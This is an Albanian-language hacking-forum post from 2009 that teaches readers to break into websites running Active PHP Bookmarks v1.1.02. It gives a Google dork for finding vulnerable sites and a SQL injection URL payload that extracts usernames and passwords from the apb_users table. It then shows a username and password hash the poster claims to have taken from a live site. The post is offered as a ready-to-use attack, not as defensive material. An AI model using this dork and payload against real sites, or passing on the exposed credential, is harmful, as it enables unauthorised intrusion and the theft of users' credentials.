...:::Mesohu-Ks:::...
Pershendetje vizitor i nderuar...
Me sa duket, ju nuk jeni identifikuar akoma ne faqen tone, ndaj po ju paraqitet ky mesazh per tju kujtuar se ju mund te identifikoheni qe te merrni pjese ne
diskutimet dhe temat e shumta te forumit tone.

- Ne qofte se ende nuk keni nje Llogari personale ne forumin ton, mund ta hapni nje te tille duke u Regjistruar
-Regjistrimi eshte falas dhe ju merr koh maksimumi 1 min...

-Gjithsesi ju falenderojme shume, per kohen qe fute ne dispozicionper te n'a vizituar ne faqen tone.

Me Respekt dhe Kenaqesi:
Staffi i Forumit : Mesohu-ks

...:::Mesohu-Ks:::...

...:::Mesohu-Ks:::...
 
ForumPortalPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 Si ti hackojm webat e fuqizuar nga Active PHP bookmarks v1.1.02

Shko poshtë 
AutoriMesazh
TRo0PiX
Administrator
Administrator
avatar

Numri i postimeve : 152
Join date : 21/04/2009

MesazhTitulli: Si ti hackojm webat e fuqizuar nga Active PHP bookmarks v1.1.02   Mon May 11, 2009 11:28 am

Si te hackojme Weba i fuqizuar nga : Active PHP Bookmarks v1.1.02

--------------------------------------------------------------------------------

Si te hackojme Web i fuqizuar nga :
Active PHP Bookmarks v1.1.02

Se pari shkojme ne Google

Dhe shenojme ket Dork ne Google

Dork :

Kodi:
inurl:bookmarks/view_group.php?id=

Dhe ja shtoni ket Exploit

Exploit :

Kodi:
view_group.php?id=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8+from+apb_users--

Duhet te ja shtojme mbas ScriptitDhe ja ku e kam gjejt une njo :

Active PHP Bookmarks

User: Paul
md5 : 273XeGvhbXl.g
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
Si ti hackojm webat e fuqizuar nga Active PHP bookmarks v1.1.02
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
...:::Mesohu-Ks:::... :: Mesohu-ks Boxi :: Hacking-
Kërce tek: